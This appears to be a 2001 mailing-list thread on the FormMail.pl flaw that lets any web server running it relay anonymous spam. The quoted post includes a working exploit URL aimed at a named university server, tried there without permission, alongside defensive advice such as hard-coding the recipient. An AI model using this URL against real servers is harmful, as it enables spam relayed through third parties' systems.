Yeah, we actually had an incident of that long ago on our webservers, seems
a few people know about it. The problem is two-fold -
1) The FormMail program uses a referrer array as the ONLY security check
for calls to the program (which can be REALLY easily faked).
2) It allows the recipient email to be sent through as an HTML variable.
There's a few ways to get around this, the way we initially got around it
was to firewall the IP address of the spammer. The best(?) way is
(if/where possible) to hard-code the recipient address into the
installation.
>From the example you sent, it doesn't look like the copy you've got is even
using the referrer security?
Michael Rawls wrote:
>
> Hi All,
> I did a little playing with FormMail.pl after a run in with a spammer
> abusing our webserver. Apparently ALL FormMail.pl cgi-bin scripts can be
> used to spam anonymously. I found another server with FormMail.pl and
> tried the same exploit to send myself an email and it worked.
>
> The email will not show the spammer's real IP. Only the web servers IP
> will show. The web server logs will however show the true IP address of
> the spammer.
>
> ===========
> Actual example of email sent;
> ============
> Return-Path: <[EMAIL PROTECTED]>
> Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
> by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
> for <[EMAIL PROTECTED]>; Sat, 10 Mar 2001 17:19:34 -0700
> Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
> id 14bta3-0004tP-00
> for [EMAIL PROTECTED]; Sun, 11 Mar 2001 01:19:27 +0100
> To: [EMAIL PROTECTED]
> From: ()
> Subject: WWW Form Submission
> Message-Id: <[EMAIL PROTECTED]>
> Date: Sun, 11 Mar 2001 01:19:27 +0100
>
> Below is the result of your feedback form. It was submitted by
> () on Sunday, March 11, 2001 at 01:19:27
> ---------------------------------------------------------------------------
>
> message: Proof that FormMail.pl can be used to send anonymous spam.
>
> ---------------------------------------------------------------------------
>
> Paste the line below in to your web browser URL box as one long single
> line, insert your email in address in place of "[EMAIL PROTECTED]",
> and press enter. Now go check your email.
>
> Begin URL code
> ================
> http://www.hum.auc.dk/cgi-bin/FormMail.pl?[EMAIL PROTECTED]
> m&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymo
> us%20spam.
> ================
>
> If this technique was not already in use by a spammer I would have kept it
> to myself, but it has already been on my server by a spammer.
>
> The address "www.hum.auc.dk" can be replaced with the address of ANY
> webserver set up to use FormMail.pl
>
> -M. Rawls
